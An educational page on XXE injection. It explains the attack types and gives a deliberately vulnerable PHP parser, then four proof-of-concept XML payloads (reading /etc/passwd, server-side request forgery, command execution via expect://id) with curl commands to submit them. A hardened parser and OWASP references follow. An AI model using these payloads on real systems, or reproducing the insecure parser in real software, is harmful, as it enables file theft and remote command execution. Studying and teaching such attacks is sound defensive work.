XXE
What is it?
XML External Entity (XXE) injection is used to attack systems that parse XML input received via file upload or other channels. The modified XML file abuses a SYSTEM entity declaration and can be used to attack a web application. Attacks include denial of service, local file disclosure, remote code execution, and more.
Extensible Markup Language (XML) is a language originally designed for desktop publishing and now widely used for data exchange. It is a markup language similar to HTML and derived from SGML, which was itself based on IBM's GML from the 1960s. XML is typically used instead of HTML when data must be sent from one application to another (data interchange).
Exploitation
XXE flaws allow injection attacks. XML by default supports "external entities". Abusing an XXE flaw lets a malicious document turn the XML parser into a proxy, potentially serving local and remote content (external entity vulnerabilities are similar to LFI/RFI in this respect). This can lead to RCE.

Types of XXE attacks
Exploiting XXE to Retrieve Files: an external entity is defined containing the contents of a file, and its value is returned in the application's response.
Exploiting XXE to Perform SSRF Attacks: an external entity is defined based on a URL to a back-end system.
Exploiting Blind XXE to Exfiltrate Data Out-of-Band: sensitive data is transmitted from the application server to a system that the attacker controls.
Exploiting Blind XXE to Retrieve Data via Error Messages: the attacker can trigger a parsing error message containing sensitive data.
SSRF via XXE
SSRF is related to CSRF. CSRF: a forged request originating from a client. SSRF: a forged request originating from a server.
Example PoC
Assume we have access to the server-side scripts. Below is the vulnerable server-side PHP script behind /book.php; viewing the page's HTML source does not reveal this code.
<?php
// Read the raw request body and parse it with entity substitution (LIBXML_NOENT)
// and DTD loading (LIBXML_DTDLOAD) enabled: this is what makes the script vulnerable.
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$xml = simplexml_import_dom($dom);
$author = $xml->author;
$title = $xml->title;
$date = $xml->publish_date;
// Expanded entity values are echoed straight back into the response.
echo "Thank you for your file submission!<br>";
echo "Your entry: <br>";
echo "Author: " . $author . "<br>";
echo "Title: " . $title . "<br>";
echo "Date: " . $date . "<br>";
?>
Because the PHP page above reads the author, title, and publish_date elements from the submitted XML and echoes them back, each payload below places the entity reference in the author element.
PoC 1- Testing payload (xxe.xml)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "TEST" >]>
<entry>
<author>&xxe;</author>
<title>Title</title>
<publish_date>1990</publish_date>
</entry>
# Upload file via file upload on site or use curl to send payload
curl -d@/home/test/xxe.xml http://test.com/book.php
# On browser route to http:
PoC 2 (LFI) - Display Local File (xxe2.xml)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<entry>
<author>&xxe;</author>
<title>Title</title>
<publish_date>1990</publish_date>
</entry>
#Upload file via file upload on site or curl to send payload
curl -d@/home/test/xxe2.xml http://test.com/book.php
PoC 3 (RFI) - Access URL (xxe3.xml)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://google.com/robots.txt" >]>
<entry>
<author>&xxe;</author>
<title>Title</title>
<publish_date>1990</publish_date>
</entry>
#Upload file via file upload on site or curl to send payload
curl -d@/home/test/xxe3.xml http://test.com/book.php
PoC 4 (RCE) - Remote Code Execution via php (xxe4.xml)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
<author>&xxe;</author>
<title>Title</title>
<publish_date>1990</publish_date>
</entry>
#Upload file via file upload on site or curl to send payload
curl -d@/home/test/xxe4.xml http://test.com/book.php
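A hardened replacement for the vulnerable /book.php shown above, added here as an example and not part of the original page. It assumes the same XML shape (entry/author/title/publish_date) and PHP 8 with ext-dom, and shows the two controls that defeat all four PoCs: rejecting any document that carries a DOCTYPE, and parsing without LIBXML_NOENT or LIBXML_DTDLOAD.

```php
<?php
// Added example, not the page's code: hardened version of /book.php.
// Assumes the same XML shape and PHP >= 8.0 with ext-dom.
function parseBookEntry(string $xml): array
{
    // A DOCTYPE is the only place <!ENTITY xxe SYSTEM "..."> can be declared,
    // so a document that carries one is rejected before it reaches libxml.
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        throw new InvalidArgumentException('DTDs are not accepted');
    }
    libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    // No LIBXML_NOENT (entities stay unexpanded) and no LIBXML_DTDLOAD
    // (external subsets are never fetched); LIBXML_NONET additionally
    // forbids the parser from opening any network URL.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    if ($ok === false) {
        throw new InvalidArgumentException('Malformed XML');
    }
    // Second layer: refuse the document if a DOCTYPE node exists anyway.
    if ($dom->doctype !== null) {
        throw new InvalidArgumentException('DTDs are not accepted');
    }
    $root = $dom->documentElement;
    if ($root === null || $root->nodeName !== 'entry') {
        throw new InvalidArgumentException('Unexpected root element');
    }
    $field = static function (DOMElement $root, string $name): string {
        $nodes = $root->getElementsByTagName($name);
        return $nodes->length > 0 ? trim($nodes->item(0)->textContent) : '';
    };
    return [
        'author' => $field($root, 'author'),
        'title'  => $field($root, 'title'),
        'date'   => $field($root, 'publish_date'),
    ];
}

// Escaping on output also closes the reflected XSS in the original echo lines.
function renderEntry(array $entry): string
{
    $e = static fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return sprintf('Author: %s<br>Title: %s<br>Date: %s<br>',
        $e($entry['author']), $e($entry['title']), $e($entry['date']));
}

// Constructed request body standing in for file_get_contents('php://input').
$body = '<?xml version="1.0"?><entry><author>Jane</author><title>T</title><publish_date>1990</publish_date></entry>';
echo renderEntry(parseBookEntry($body)), "\n";
```

Feeding any of xxe.xml through xxe4.xml to parseBookEntry() raises the "DTDs are not accepted" exception instead of expanding the entity.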
Sample payload
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
Payloads
Good Resource for payloads: https://github.com/payloadbox/xxe-injection-payload-list
Cheat sheet
OWASP XML Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
Other Resources
OWASP's XML External Entity (XXE) Processing: https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
Blind XXE: https://portswigger.net/web-security/xxe/blind
Exploiting XXE with local DTD files: https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
From blind XXE to root-level file read access: https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/